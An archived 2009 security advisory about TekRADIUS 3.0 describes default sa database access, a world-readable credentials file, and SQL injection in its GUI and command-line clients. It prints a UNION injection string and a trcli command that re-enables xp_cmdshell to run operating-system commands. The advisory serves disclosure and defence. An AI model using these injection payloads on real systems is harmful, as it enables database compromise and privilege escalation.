AOH :: HP Unsorted M :: BT-21269.HTM

Medium security hole in TekRADIUS



Medium security hole in TekRADIUS
Medium security hole in TekRADIUS



--nextPart3018975.Jnh7iOIGuS
Content-Type: multipart/mixed;
  boundary="Boundary-01=_DrUUKbsJHeMqhkD"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

--Boundary-01=_DrUUKbsJHeMqhkD
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hi,

I've identified a couple of security flaws affecting the TekRADIUS radius 
server for Windows which may allow privilege escalation.  These issues were 
reported by email to the vendor and have I believe been resolved.
 
Tim
=2D- 
Tim Brown
 
 

--Boundary-01=_DrUUKbsJHeMqhkD
Content-Type: application/pgp-keys;
  name="NDSA20090412.txt.asc"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename="NDSA20090412.txt.asc"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20090412)
Date: 12th April 2009
Author: Tim Brown  
URL:  /  
Product: TekRADIUS 3.0  
Vendor: Yasin KAPLAN  
Risk: Medium

Summary

This advisory comes in 3 related parts:

1) By default, TekRADIUS connects to SQL Server as the sa (or equivelent)
account, this is to allow it to create its database.

2) The TekRADIUS database credentials are stored in obfuscated form, but
the file itself is accessible by any Windows user.

3) TekRADIUS comes with GUI and command line clients.  These do not
sanitise all input satisfactorily.  This can lead to SQL injection
allowing compromise of the database server and privilege escalation at
the Windows level.

Technical Details

1) In the event that TekRADIUS is configured to use the sa (or equivelent)
account in order to access its database after initial creation, then any
failure to correctly satitise input, which results in SQL injection may
allow an attacker privileged access to the database server.

2) TekRADIUS stores the database credentials in C:\Program Files\TekRADIUS\TekRADIUS.ini.
As we can see below, this file is accessible by any local Windows
user including all members of the Users group:

C:\Program Files\TekRADIUS>cacls TekRADIUS.ini
C:\Program Files\TekRADIUS\TekRADIUS.ini BUILTIN\Users:R
                                         BUILTIN\Power Users:C
                                         BUILTIN\Administrators:F
                                         NT AUTHORITY\SYSTEM:F
                                         NT AUTHORITY\TERMINAL SERVER USER:C

This happens even when we change the default install option and
opt only to install TekRADIUS for the current Windows user, and appears to
be by design as we discuss later.  Note that the credentials are obfuscated
with the intention of preventing direct database access.

3) TekRADIUS is intended to be managed using either a GUI or command line
client.  In both cases, non-privileged Windows users are only presented with
limited functionality designed to prevent certain changes being made.
However, this is not entirely successful due to insufficient input santisation
which can lead to SQL injection.

When the GUI is opened by a non-privileged user, they are presented with a
window containing 3 tabs, one of which is the "Users" tab.  Within this is a
"Browse Users" text box.  Injecting the following string in to this text box:

' union select system_user,@@version;--

Results in a table being returned containing the results as queried.

Whilst the command line client correctly sanitises most input, in one case
this is not the case and it is therefore possible to inject arbitrary SQL
in to queries made to the database server.  For example:

C:\Program Files\TekRADIUS>trcli -r "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell', 1; reconfigure; exec master.dbo.xp_cmdshell 'ping www.nth-dimension.org.uk'--" 

This injects the neccessary SQL calls to reenable xp_cmdshell (neccessary on
SQL Server 2005) and execute "ping www.nth-dimension.org.uk". 

Solutions

Unfortunately, Nth Dimension are unware of any fixes for these issues at the
current time.  The vendor was contacted on the 13th April 2009 and immediately
responded.  The vendor provided a private patch that partially resolved the
issue and Nth Dimension gave feedback outlining further issues with SQL
injection into the GUI and suggesting parameterised queries.  Nth Dimension
also made suggestions around the installation routine to resolve the file
permission issues.  Nth Dimension are not aware that the patch or the
additional feedback has been included in to the public product and no further
emails have been received.  We would recommend that access to TekRADIUS.ini
is revoked for untrusted users, and that TekRADIUS is reconfigured to use
a non-privileged database account.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQIcBAEBAgAGBQJKUUSgAAoJEPJhpTVyySo7fJ0QAJesL6krHe6y/4uiCBeZTJ3b
ytt+nMHLo5urA1M8Y13H+C67D1Jopcw7VoTlcTJEDBXd0KFMPO1IlztKQQCs1G3P
DQ7OrRDf/8GCca+BY8dFWYC82QgRVRO/zQzWqxPsh9gMZ2qJYYbzF1fpkRxs/yT7
JzuD8eTDN2bth0EUhCgPd2LzP/qUDRZ98r254/Ml4DMo2Gg/iFZEkl2vHMnVwK8i
wErIrNo7Z/kFoQOx1GOwZNjZh+ZnidQlU4Lj98sire+Ly4JryELUAkck0NjpA2TV
Q9kaw+2ib/U8OO3Hk00HxN+MXedT3fqVyIB2um5n5dVBnTC0EnU94qjEGlanHDuP
StVseruE43cW01ye5nDmB3hBuun4JnRe5IHl9ljU6r8uFIuHdoiODd2Pg/um7L5E
gTFyC57TQXwK2Ux4nG0hS5QmhudXbOrcN0yWad88qR0WfpTysRft10mXqm8nBGoE
nbfUKlneR9QN3bRzFeiDjM8v1dfCRFgJUovVAY2E4+RmcEGXfoCU01bPbs/JxroQ
0htkv586rVePJiGne0zQxOHc+e8cDn5urggAPtqGqEzTYknzQzD0zxjmE3CICGr4
AwHG7slghOSxQuUvL1CCqnTrvZ8+L8M86/loiCOElFT5YnDAwqgTpd1QM+8qyAUo
4JAGK/YRJDZYYQ8uUDPN
=ZC+P
-----END PGP SIGNATURE-----

--Boundary-01=_DrUUKbsJHeMqhkD--

--nextPart3018975.Jnh7iOIGuS
Content-Type: application/pgp-signature; name=signature.asc 
Content-Description: This is a digitally signed message part.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQIcBAABAgAGBQJKUUrDAAoJEPJhpTVyySo7H8cP/33M39oTOnYmijX342yRmEjl
rmQ06tTqZcrVlgnhjPGmUg08N/b3h0DDl3Dh6YHHjO3zQFZXgU+XJ2YFmPnELei4
GV0buRCaheOIgpmhEnuKxloQ5Xi4cSA0CEkRXXguXtlfoEqOkJ3EIj+aGlaNXv2V
/vQewX0J6DOT7JxQFKEv0mSLljOvrraaPB9hVtvSsng+lRzSvVM2XPJytqsVHuH0
icAT4hIhs74Yhq1DANVnl96VAW6GkXxU/5P+Yy1CHaBPj/uzM86dJ+Aj7kppBmXP
d4QF4NbM0msDlyoMirqVkniTHaN30B0aQBEa4RyfIrlAYPQon9AJMupf1KWnEnC/
jRUTpaT+xS1IidvvVrgRR0wtAfu0zJWO9JXnK4xSp/fv6VZ1/PxrsNWPbyyZ5mXf
UTZY9C9vUATSGIm1eOtPeW82SNHTsplJETzFEX6CXaQHJrdaLCKK/PwKdvORTguz
Nx6l/W4eRm6ha0n589srT/8wFez28+6g3DnQKVHTznM/dnXHqj1R5ok6cr5f+RYe
JLkUktSZyHlbJhCGVcI6LQ656bzNlzQZ5JhMLDGK61VDTelVn/Bd1xfkheSSafM1
T27gqxFoZUCjHYTSeU2MgaYuocycNT71coqP2v7d9W9bflUD0auA9KlYJrxFu22l
ftSR1eSi0SknFYIc+xja
=VV8f
-----END PGP SIGNATURE-----

--nextPart3018975.Jnh7iOIGuS--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.